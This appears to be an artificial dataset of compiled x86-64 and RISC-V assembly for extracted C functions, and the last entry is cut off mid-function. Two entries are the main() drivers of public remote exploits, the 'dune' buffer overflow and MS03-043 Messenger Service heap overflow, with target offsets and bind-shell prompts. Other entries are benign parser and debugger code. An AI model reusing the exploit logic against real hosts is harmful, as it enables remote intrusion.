.file "extr_22786.c_main_aug_v3_8.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] dune[0.6.7+-]: remote buffer overflow exploit.\n[*] by: vade79/v9 [email protected] (fakehalo)\n" .align 8 .LC1: .string "[!] syntax: %s <hostname> [port] [offset] [shell port]\n\n" .align 8 .LC2: .string "[!] shell port defined contains bad character(s), using default." .align 8 .LC3: .string " target:%s:%d addresses:0x%.8x(+%ld)-0x%.8x\n\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC4: .string "[. = 350 byte offset]: " .section .rodata.str1.8 .align 8 .LC5: .string "(hit memory limit, aborting)\n\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 movl %edi, %r13d leaq .LC0(%rip), %rdi pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 movq %rsi, %rbp pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 subq $8, %rsp .cfi_def_cfa_offset 48 call puts@PLT cmpl $1, %r13d jle .L35 xorl %ebx, %ebx movl $80, %r12d cmpl $2, %r13d jne .L36 .L3: movl $7979, %r13d movl $43, %eax .L13: movl %r13d, %ecx shrw $8, %cx .L7: movq x86_exec(%rip), %rdx movq 8(%rbp), %rsi movq %rbx, %r8 leaq .LC3(%rip), %rdi movl END_ADDR(%rip), %r9d movw %cx, 40(%rdx) movl BASE_ADDR(%rip), %ecx movw %ax, 42(%rdx) movl %r12d, %edx xorl %eax, %eax call printf@PLT movl stderr(%rip), %edi leaq .LC4(%rip), %rsi call fprintf@PLT jmp .L33 .p2align 4,,10 .p2align 3 .L37: movzbl %bl, %eax addq %rcx, %rax jne .L9 addq $1, %rbx movzbl %bl, %eax addq %rcx, %rax .L9: cmpq $255, %rax movq 8(%rbp), %rdi movl %r12d, %esi sete %al movzbl %al, %eax subq %rax, %rbx addl %ebx, %edx call request_url@PLT movl $1, %edi call sleep@PLT movq 8(%rbp), %rdi movq %rbx, %rdx movl %r13d, %esi addq $350, %rbx call getshell@PLT .L33: movslq BASE_ADDR(%rip), %rcx movslq END_ADDR(%rip), %rax leaq (%rcx,%rbx), %rsi movq %rcx, %rdx cmpq %rax, %rsi jb .L37 movl stderr(%rip), %edi leaq .LC5(%rip), %rsi call fprintf@PLT xorl %edi, %edi call exit@PLT addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L36: .cfi_restore_state movq 16(%rbp), %rdi call atoi@PLT movzwl %ax, %r12d cmpl $3, %r13d je .L3 movq 24(%rbp), %rdi call atoi@PLT movq %rax, %rbx cmpl $4, %r13d je .L3 movq 32(%rbp), %rdi call atoi@PLT movl %eax, %edx movzwl %ax, %r13d shrw $8, %dx cmpw $255, %dx jne .L38 movzbl %al, %eax cmpw $255, %ax je .L5 .L6: testw %ax, %ax jne .L13 .L5: leaq .LC2(%rip), %rdi movl $7979, %r13d call puts@PLT movl $43, %eax movl $31, %ecx jmp .L7 .L38: movzbl %al, %eax testw %dx, %dx je .L5 jmp .L6 .L35: movq 0(%rbp), %rsi leaq .LC1(%rip), %rdi xorl %eax, %eax xorl %ebx, %ebx movl $80, %r12d call printf@PLT movl $1, %edi call exit@PLT jmp .L3 .cfi_endproc .LFE1: .size main, .-main .globl x86_exec .bss .align 8 .type x86_exec, @object .size x86_exec, 8 x86_exec: .zero 8 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl END_ADDR .align 4 .type END_ADDR, @object .size END_ADDR, 4 END_ADDR: .zero 4 .globl BASE_ADDR .align 4 .type BASE_ADDR, @object .size BASE_ADDR, 4 BASE_ADDR: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22786.c_main_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] dune[0.6.7+-]: remote buffer overflow exploit.\n[*] by: vade79/v9 [email protected] (fakehalo)\n" .align 3 .LC1: .string "[!] syntax: %s <hostname> [port] [offset] [shell port]\n\n" .align 3 .LC2: .string "[!] shell port defined contains bad character(s), using default." .align 3 .LC3: .string " target:%s:%d addresses:0x%.8x(+%ld)-0x%.8x\n\n" .align 3 .LC4: .string "[. = 350 byte offset]: " .align 3 .LC5: .string "(hit memory limit, aborting)\n\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-48 sd s1,24(sp) mv s1,a0 lla a0,.LC0 sd s2,16(sp) sd ra,40(sp) sd s0,32(sp) sd s3,8(sp) sd s4,0(sp) mv s2,a1 call puts@plt li a5,1 ble s1,a5,.L26 li a5,2 li s0,0 li s4,80 bne s1,a5,.L27 .L3: li s3,8192 addi s3,s3,-213 li a7,43 li a0,31 .L12: slli a0,a0,48 srli a0,a0,48 .L7: lla s1,.LANCHOR0 ld a6,0(s1) ld a1,8(s2) lw a5,8(s1) lw a3,12(s1) mv a4,s0 mv a2,s4 sh a0,40(a6) sh a7,42(a6) lla a0,.LC3 call printf@plt lw a0,16(s1) lla a1,.LC4 call fprintf@plt lw a2,12(s1) lw a5,8(s1) add a4,a2,s0 bgeu a4,a5,.L11 .L8: andi a5,s0,255 add a5,a5,a2 mv a1,s4 bne a5,zero,.L9 addi s0,s0,1 andi a5,s0,255 add a5,a5,a2 .L9: addi a5,a5,-255 seqz a5,a5 ld a0,8(s2) sub s0,s0,a5 addw a2,s0,a2 call request_url@plt li a0,1 call sleep@plt ld a0,8(s2) mv a2,s0 mv a1,s3 call getshell@plt lw a2,12(s1) lw a5,8(s1) addi s0,s0,350 add a4,a2,s0 bltu a4,a5,.L8 .L11: lw a0,16(s1) lla a1,.LC5 call fprintf@plt li a0,0 call exit@plt ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) ld s2,16(sp) ld s3,8(sp) ld s4,0(sp) li a0,0 addi sp,sp,48 jr ra .L27: ld a0,16(s2) call atoi@plt slli s4,a0,48 li a5,3 srli s4,s4,48 beq s1,a5,.L3 ld a0,24(s2) call atoi@plt li a5,4 mv s0,a0 beq s1,a5,.L3 ld a0,32(s2) call atoi@plt slli s3,a0,48 srli s3,s3,48 srli a4,s3,8 li a3,255 srliw a0,s3,8 bne a4,a3,.L28 andi a5,s3,0xff andi a3,s3,255 beq a5,a4,.L5 .L6: slli a7,a3,48 srli a7,a7,48 bne a3,zero,.L12 .L5: lla a0,.LC2 call puts@plt li s3,8192 li a7,43 li a0,31 addi s3,s3,-213 j .L7 .L28: andi a3,s3,255 beq a4,zero,.L5 j .L6 .L26: ld a1,0(s2) lla a0,.LC1 li s0,0 call printf@plt li a0,1 call exit@plt li s4,80 j .L3 .size main, .-main .globl x86_exec .globl stderr .globl END_ADDR .globl BASE_ADDR .bss .align 3 .set .LANCHOR0,. + 0 .type x86_exec, @object .size x86_exec, 8 x86_exec: .zero 8 .type END_ADDR, @object .size END_ADDR, 4 END_ADDR: .zero 4 .type BASE_ADDR, @object .size BASE_ADDR, 4 BASE_ADDR: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_23247.c_main_aug_v3_6
.file "extr_23247.c_main_aug_v3_6.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string " Target OS version:\n" .LC2: .string " [%d]\t%s\n" .section .rodata.str1.8 .align 8 .LC3: .string "\n Usage: %s [TargetIP] [ver: 0 | 1]\n eg: msgr.exe 192.168.63.130 0\n" .align 8 .LC4: .string "[*] Target: \t IP: %s\t OS: %s\n[*] UEF: \t 0x%x\n[*] JMP: \t 0x%x\n\n" .section .rodata.str1.1 .LC5: .string "[*] WSAStartup initialized..." .section .rodata.str1.8 .align 8 .LC6: .string "[x] Socket not initialized! Exiting..." .section .rodata.str1.1 .LC7: .string "[*] Socket initialized..." .section .rodata.str1.8 .align 8 .LC8: .string "[*] Injecting packet into a remote process..." .align 8 .LC9: .string "[x] Failed to inject packet! Exiting..." .section .rodata.str1.1 .LC10: .string "[*] Packet injected..." .section .rodata.str1.8 .align 8 .LC11: .string "[i] Try connecting to %s:9191\n\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $4096, %rsp .cfi_def_cfa_offset 4152 orq $0, (%rsp) subq $4096, %rsp .cfi_def_cfa_offset 8248 orq $0, (%rsp) subq $136, %rsp .cfi_def_cfa_offset 8384 movdqa .LC12(%rip), %xmm0 xorl %edx, %edx movq %fs:40, %rax movq %rax, 8312(%rsp) xorl %eax, %eax movq %rsi, %r12 movaps %xmm0, 32(%rsp) movl %edi, %ebx movabsq $45554120269875, %rax movdqa .LC13(%rip), %xmm0 movq VER(%rip), %rsi leaq .LC0(%rip), %rdi movq %rax, 48(%rsp) xorl %eax, %eax movw %ax, 60(%rsp) movabsq $8542599785212675148, %rax movq %rax, 64(%rsp) movabsq $8648247545378468788, %rax movq %rax, 104(%rsp) xorl %eax, %eax movl $0, 56(%rsp) movq $695100712, 88(%rsp) movl $0, 96(%rsp) movw %dx, 100(%rsp) movups %xmm0, 72(%rsp) call printf@PLT cmpl $2, %ebx jle .L12 movq 16(%r12), %rdi leaq 20(%rsp), %r15 leaq 112(%rsp), %r14 call atoi@PLT movq 8(%r12), %rsi leaq .LC4(%rip), %rdi movslq %eax, %rbx xorl %eax, %eax imulq $40, %rbx, %rbx movl 68(%rsp,%rbx), %r8d movl 64(%rsp,%rbx), %ecx leaq 32(%rsp,%rbx), %rdx call printf@PLT leaq 12(%rsp), %rsi movl $514, %edi call WSAStartup@PLT leaq .LC5(%rip), %rdi call puts@PLT movl $12, %esi movq %r15, %rdi call ZeroMemory@PLT movl AF_INET(%rip), %eax movq 8(%r12), %rdi movl %eax, 28(%rsp) call inet_addr@PLT movl $135, %edi movl %eax, 24(%rsp) call htons@PLT movl 64(%rsp,%rbx), %ecx movl 68(%rsp,%rbx), %edx movq %r14, %rdi movl $8192, %esi movl %eax, 20(%rsp) call PreparePacket@PLT movl IPPROTO_UDP(%rip), %edx movl SOCK_DGRAM(%rip), %esi movl AF_INET(%rip), %edi movl %eax, %r13d call socket@PLT movl %eax, %ebp cmpl $-1, %eax je .L13 leaq .LC7(%rip), %rdi call puts@PLT leaq .LC8(%rip), %rdi call puts@PLT xorl %ecx, %ecx movl $12, %r9d movq %r15, %r8 movl %r13d, %edx movq %r14, %rsi movl %ebp, %edi call sendto@PLT addl $1, %eax je .L14 leaq .LC10(%rip), %rdi call puts@PLT movq 8(%r12), %rsi leaq .LC11(%rip), %rdi xorl %eax, %eax call printf@PLT movl $0, 16(%rsp) movl 16(%rsp), %eax cmpl $4, %eax jg .L6 .p2align 4,,10 .p2align 3 .L7: movl 16(%rsp), %eax addl $1, %eax movl %eax, 16(%rsp) movl 16(%rsp), %eax cmpl $4, %eax jle .L7 .L6: xorl %eax, %eax .L1: movq 8312(%rsp), %rdx subq %fs:40, %rdx jne .L15 addq $8328, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L12: .cfi_restore_state leaq .LC1(%rip), %rdi call puts@PLT leaq 32(%rsp), %rdx xorl %esi, %esi xorl %eax, %eax leaq .LC2(%rip), %rdi call printf@PLT movq (%r12), %rsi leaq .LC3(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %eax jmp .L1 .L14: leaq .LC9(%rip), %rdi call puts@PLT movl $1, %eax jmp .L1 .L13: leaq .LC6(%rip), %rdi call puts@PLT movl $1, %eax jmp .L1 .L15: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl VER .bss .align 8 .type VER, @object .size VER, 8 VER: .zero 8 .globl SOCK_DGRAM .align 4 .type SOCK_DGRAM, @object .size SOCK_DGRAM, 4 SOCK_DGRAM: .zero 4 .globl IPPROTO_UDP .align 4 .type IPPROTO_UDP, @object .size IPPROTO_UDP, 4 IPPROTO_UDP: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .section .rodata.cst16,"aM",@progbits,16 .align 16 .LC12: .quad 2338343951845452119 .quad 2328452405063069746 .align 16 .LC13: .quad 2338343951845452119 .quad 2319670812436615256 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_23247.c_main_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC1: .string "\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n" .align 3 .LC2: .string " Target OS version:\n" .align 3 .LC3: .string " [%d]\t%s\n" .align 3 .LC4: .string "\n Usage: %s [TargetIP] [ver: 0 | 1]\n eg: msgr.exe 192.168.63.130 0\n" .align 3 .LC5: .string "[*] Target: \t IP: %s\t OS: %s\n[*] UEF: \t 0x%x\n[*] JMP: \t 0x%x\n\n" .align 3 .LC6: .string "[*] WSAStartup initialized..." .align 3 .LC7: .string "[x] Socket not initialized! Exiting..." .align 3 .LC8: .string "[*] Socket initialized..." .align 3 .LC9: .string "[*] Injecting packet into a remote process..." .align 3 .LC10: .string "[x] Failed to inject packet! Exiting..." .align 3 .LC11: .string "[*] Packet injected..." .align 3 .LC12: .string "[i] Try connecting to %s:9191\n\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-192 lla a5,.LANCHOR0 li t6,8192 sd s0,176(sp) sd s1,168(sp) sd s3,152(sp) ld t5,0(a5) ld t4,8(a5) ld t3,16(a5) ld t1,24(a5) ld a7,32(a5) ld a6,40(a5) ld a2,48(a5) ld a3,56(a5) ld a4,64(a5) li t0,-8192 addi s0,t6,112 lla s3,.LANCHOR1 li s1,-8192 sd ra,184(sp) sd s2,160(sp) sd s4,144(sp) sd s5,136(sp) sd s6,128(sp) sd s7,120(sp) sd s8,112(sp) ld a5,72(a5) add sp,sp,t0 mv s2,a1 addi t0,t6,104 ld a1,0(s3) add s0,s0,s1 add s0,s0,sp add t0,t0,sp la s5,__stack_chk_guard ld t6, 0(s5) sd t6, 0(t0) li t6, 0 sd t5,-88(s0) sd t4,-80(s0) sd t3,-72(s0) sd t1,-64(s0) sd a7,-56(s0) sd a6,-48(s0) sd a2,-40(s0) sd a3,-32(s0) sd a4,-24(s0) mv s4,a0 lla a0,.LC1 sd a5,-16(s0) call printf@plt li a5,2 ble s4,a5,.L12 ld a0,16(s2) li s8,8192 addi s7,s1,-104 call atoi@plt li a5,40 mul a5,a0,a5 addi a2,s1,-88 addi a4,s8,112 add a4,a4,a2 ld a1,8(s2) add a2,a4,sp lla a0,.LC5 li s6,-1 add s4,s0,a5 lw a4,-52(s4) lw a3,-56(s4) add a2,a2,a5 call printf@plt addi a1,s1,-112 addi a5,s8,112 add a5,a5,a1 add a1,a5,sp li a0,514 call WSAStartup@plt lla a0,.LC6 call puts@plt addi a5,s8,112 add a5,a5,s7 add s7,a5,sp li a1,12 mv a0,s7 call ZeroMemory@plt lw a5,8(s3) ld a0,8(s2) addi s1,s1,-8 sw a5,-96(s0) call inet_addr@plt mv a5,a0 li a0,135 sw a5,-100(s0) call htons@plt addi a4,s8,112 lw a3,-56(s4) lw a2,-52(s4) add a4,a4,s1 add s1,a4,sp mv a5,a0 li a1,8192 mv a0,s1 sw a5,-104(s0) call PreparePacket@plt lw a2,12(s3) lw a1,16(s3) mv s4,a0 lw a0,8(s3) call socket@plt mv s3,a0 beq a0,s6,.L13 lla a0,.LC8 call puts@plt lla a0,.LC9 call puts@plt li a5,12 mv a4,s7 li a3,0 mv a2,s4 mv a1,s1 mv a0,s3 call sendto@plt beq a0,s6,.L14 lla a0,.LC11 call puts@plt ld a1,8(s2) lla a0,.LC12 call printf@plt sw zero,-108(s0) lw a4,-108(s0) li a5,4 bgt a4,a5,.L6 li a4,4 .L7: lw a5,-108(s0) addiw a5,a5,1 sw a5,-108(s0) lw a5,-108(s0) ble a5,a4,.L7 .L6: li a0,0 .L3: li a5,8192 addi a5,a5,104 add a5,a5,sp ld a4, 0(a5) ld a5, 0(s5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L15 li t0,8192 add sp,sp,t0 ld ra,184(sp) ld s0,176(sp) ld s1,168(sp) ld s2,160(sp) ld s3,152(sp) ld s4,144(sp) ld s5,136(sp) ld s6,128(sp) ld s7,120(sp) ld s8,112(sp) addi sp,sp,192 jr ra .L12: lla a0,.LC2 call puts@plt li a5,8192 addi a2,s1,-88 addi a5,a5,112 add a5,a5,a2 add a2,a5,sp li a1,0 lla a0,.LC3 call printf@plt ld a1,0(s2) lla a0,.LC4 call printf@plt li a0,1 j .L3 .L14: lla a0,.LC10 call puts@plt li a0,1 j .L3 .L13: lla a0,.LC7 call puts@plt li a0,1 j .L3 .L15: call __stack_chk_fail@plt .size main, .-main .globl VER .globl SOCK_DGRAM .globl IPPROTO_UDP .globl AF_INET .section .rodata .align 3 .set .LANCHOR0,. + 0 .LC0: .string "Windows 2000 SP 3 (en)" .zero 7 .zero 2 .word 2012087372 .word 1988979006 .string "Windows XP SP 1 (en)" .zero 9 .zero 2 .word 2012050356 .word 2013577042 .bss .align 3 .set .LANCHOR1,. + 0 .type VER, @object .size VER, 8 VER: .zero 8 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type IPPROTO_UDP, @object .size IPPROTO_UDP, 4 IPPROTO_UDP: .zero 4 .type SOCK_DGRAM, @object .size SOCK_DGRAM, 4 SOCK_DGRAM: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_inicache.c_IniCacheLoadFromMemory_aug_v3_4
.file "extr_inicache.c_IniCacheLoadFromMemory_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "RtlAllocateHeap() failed\n" .LC1: .string "[%.*s]\n" .LC2: .string "IniCacheAddSection() failed\n" .LC3: .string "'%.*s' = '%.*s'\n" .LC4: .string "IniCacheAddKey() failed\n" .text .p2align 4 .globl IniCacheLoadFromMemory .type IniCacheLoadFromMemory, @function IniCacheLoadFromMemory: .LFB25: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movq %rsi, %r15 movl $4, %edx pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 leaq .LC1(%rip), %r14 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 movq %rdi, %r13 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 leaq .LC3(%rip), %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %ecx, %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 xorl %ebx, %ebx subq $56, %rsp .cfi_def_cfa_offset 112 movl HEAP_ZERO_MEMORY(%rip), %esi movl ProcessHeap(%rip), %edi movq %fs:40, %rax movq %rax, 40(%rsp) xorl %eax, %eax call RtlAllocateHeap@PLT movq %rax, 0(%r13) testq %rax, %rax je .L15 .p2align 4,,10 .p2align 3 .L2: testq %r15, %r15 je .L8 .L7: movq %r15, %rdi call IniCacheSkipWhitespace@PLT movq %rax, %rdi testq %rax, %rax je .L8 cmpb $91, (%rax) je .L16 testq %rbx, %rbx je .L17 leaq 8(%rsp), %rdx leaq 24(%rsp), %rsi call IniCacheGetKeyName@PLT leaq 12(%rsp), %rdx leaq 32(%rsp), %rsi movl %ebp, %ecx movq %rax, %rdi call IniCacheGetKeyValue@PLT movl 12(%rsp), %ecx movl 8(%rsp), %esi movq %r12, %rdi movq 32(%rsp), %r8 movq 24(%rsp), %rdx movq %rax, %r15 xorl %eax, %eax call DPRINT@PLT movl 12(%rsp), %r8d movq 32(%rsp), %rcx movq %rbx, %rdi movl 8(%rsp), %edx movq 24(%rsp), %rsi call IniCacheAddKey@PLT testq %rax, %rax jne .L2 leaq .LC4(%rip), %rdi call DPRINT@PLT testq %r15, %r15 jne .L7 .p2align 4,,10 .p2align 3 .L8: movzbl 0, %eax ud2 .p2align 4,,10 .p2align 3 .L16: subq $1, %rdi leaq 4(%rsp), %rdx leaq 16(%rsp), %rsi call IniCacheGetSectionName@PLT movq 16(%rsp), %rdx movl 4(%rsp), %esi movq %r14, %rdi movq %rax, %r15 xorl %eax, %eax call DPRINT@PLT movl 4(%rsp), %edx movq 16(%rsp), %rsi movq 0(%r13), %rdi call IniCacheAddSection@PLT movq %rax, %rbx testq %rax, %rax jne .L2 leaq .LC2(%rip), %rdi xorl %eax, %eax call DPRINT@PLT movq %r15, %rdi call IniCacheSkipToNextSection@PLT movq %rax, %r15 jmp .L2 .p2align 4,,10 .p2align 3 .L17: call IniCacheSkipToNextSection@PLT movq %rax, %r15 jmp .L2 .L15: leaq .LC0(%rip), %rdi call DPRINT@PLT movl STATUS_INSUFFICIENT_RESOURCES(%rip), %eax movq 40(%rsp), %rdx subq %fs:40, %rdx jne .L18 addq $56, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L18: .cfi_restore_state call __stack_chk_fail@PLT .cfi_endproc .LFE25: .size IniCacheLoadFromMemory, .-IniCacheLoadFromMemory .globl STATUS_SUCCESS .bss .align 4 .type STATUS_SUCCESS, @object .size STATUS_SUCCESS, 4 STATUS_SUCCESS: .zero 4 .globl STATUS_INSUFFICIENT_RESOURCES .align 4 .type STATUS_INSUFFICIENT_RESOURCES, @object .size STATUS_INSUFFICIENT_RESOURCES, 4 STATUS_INSUFFICIENT_RESOURCES: .zero 4 .globl ProcessHeap .align 4 .type ProcessHeap, @object .size ProcessHeap, 4 ProcessHeap: .zero 4 .globl HEAP_ZERO_MEMORY .align 4 .type HEAP_ZERO_MEMORY, @object .size HEAP_ZERO_MEMORY, 4 HEAP_ZERO_MEMORY: .zero 4 .globl g_aug_volatile_5350 .data .align 4 .type g_aug_volatile_5350, @object .size g_aug_volatile_5350, 4 g_aug_volatile_5350: .long 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_inicache.c_IniCacheLoadFromMemory_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "RtlAllocateHeap() failed\n" .align 3 .LC1: .string "[%.*s]\n" .align 3 .LC2: .string "IniCacheAddSection() failed\n" .align 3 .LC3: .string "'%.*s' = '%.*s'\n" .align 3 .LC4: .string "IniCacheAddKey() failed\n" .text .align 1 .globl IniCacheLoadFromMemory .type IniCacheLoadFromMemory, @function IniCacheLoadFromMemory: addi sp,sp,-160 sd s1,136(sp) lla s1,.LANCHOR0 sd s8,80(sp) sd s11,56(sp) mv s8,a0 mv s11,a1 lw a0,4(s1) lw a1,0(s1) sd s3,120(sp) la s3,__stack_chk_guard li a2,4 ld a5, 0(s3) sd a5, 40(sp) li a5, 0 sd s2,128(sp) sd ra,152(sp) sd s0,144(sp) sd s4,112(sp) sd s5,104(sp) sd s6,96(sp) sd s7,88(sp) sd s9,72(sp) sd s10,64(sp) mv s2,a3 call RtlAllocateHeap@plt sd a0,0(s8) beq a0,zero,.L12 li s0,0 li s1,91 addi s7,sp,8 addi s6,sp,24 addi s5,sp,12 addi s4,sp,32 lla s3,.LC3 addi s10,sp,4 addi s9,sp,16 .L2: beq s11,zero,.L8 .L7: mv a0,s11 call IniCacheSkipWhitespace@plt beq a0,zero,.L8 lbu a4,0(a0) beq a4,s1,.L16 beq s0,zero,.L17 mv a2,s7 mv a1,s6 call IniCacheGetKeyName@plt mv a3,s2 mv a2,s5 mv a1,s4 call IniCacheGetKeyValue@plt ld a4,32(sp) lw a3,12(sp) ld a2,24(sp) lw a1,8(sp) mv s11,a0 mv a0,s3 call DPRINT@plt lw a4,12(sp) ld a3,32(sp) lw a2,8(sp) ld a1,24(sp) mv a0,s0 call IniCacheAddKey@plt bne a0,zero,.L2 lla a0,.LC4 call DPRINT@plt bne s11,zero,.L7 .L8: lbu a5,0(zero) ebreak .L16: mv a2,s10 mv a1,s9 addi a0,a0,-1 call IniCacheGetSectionName@plt ld a2,16(sp) lw a1,4(sp) mv s11,a0 lla a0,.LC1 call DPRINT@plt lw a2,4(sp) ld a1,16(sp) ld a0,0(s8) call IniCacheAddSection@plt mv s0,a0 bne a0,zero,.L2 lla a0,.LC2 call DPRINT@plt mv a0,s11 call IniCacheSkipToNextSection@plt mv s11,a0 j .L2 .L17: call IniCacheSkipToNextSection@plt mv s11,a0 j .L2 .L12: lla a0,.LC0 call DPRINT@plt ld a4, 40(sp) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 lw a0,8(s1) bne a5,zero,.L18 ld ra,152(sp) ld s0,144(sp) ld s1,136(sp) ld s2,128(sp) ld s3,120(sp) ld s4,112(sp) ld s5,104(sp) ld s6,96(sp) ld s7,88(sp) ld s8,80(sp) ld s9,72(sp) ld s10,64(sp) ld s11,56(sp) addi sp,sp,160 jr ra .L18: call __stack_chk_fail@plt .size IniCacheLoadFromMemory, .-IniCacheLoadFromMemory .globl STATUS_SUCCESS .globl STATUS_INSUFFICIENT_RESOURCES .globl ProcessHeap .globl HEAP_ZERO_MEMORY .globl g_aug_volatile_5350 .data .align 2 .type g_aug_volatile_5350, @object .size g_aug_volatile_5350, 4 g_aug_volatile_5350: .word 8 .bss .align 2 .set .LANCHOR0,. + 0 .type HEAP_ZERO_MEMORY, @object .size HEAP_ZERO_MEMORY, 4 HEAP_ZERO_MEMORY: .zero 4 .type ProcessHeap, @object .size ProcessHeap, 4 ProcessHeap: .zero 4 .type STATUS_INSUFFICIENT_RESOURCES, @object .size STATUS_INSUFFICIENT_RESOURCES, 4 STATUS_INSUFFICIENT_RESOURCES: .zero 4 .type STATUS_SUCCESS, @object .size STATUS_SUCCESS, 4 STATUS_SUCCESS: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_cmd.c_cmd_panels_aug_v3_4
.file "extr_cmd.c_cmd_panels_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "Usage: v[*i]\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "v.test # save current layout with name test\n" .align 8 .LC2: .string "v test # load saved layout with name test\n" .align 8 .LC3: .string "vi ... # launch 'cfg.editor'\n" .section .rodata.str1.1 .LC4: .string "scr.layout" .LC5: .string "Cannot open file (%s)\n" .text .p2align 4 .type cmd_panels, @function cmd_panels: .LFB0: .cfi_startproc endbr64 pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 pushq %rbp .cfi_def_cfa_offset 24 .cfi_offset 6, -24 movq %rdi, %rbp subq $8, %rsp .cfi_def_cfa_offset 32 cmpq $0, 16(%rdi) jne .L15 movzbl (%rsi), %eax movq %rsi, %rdi cmpb $63, %al je .L18 cmpb $32, %al je .L19 cmpb $61, %al je .L20 cmpb $105, %al je .L21 movl 0(%rbp), %esi movq %rbp, %rdi call r_core_visual_panels_root@PLT movl $1, %eax .L1: addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 24 popq %rbp .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L21: .cfi_restore_state movl $32, %esi call strchr@PLT testq %rax, %rax jne .L22 .p2align 4,,10 .p2align 3 .L15: xorl %eax, %eax .L24: addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 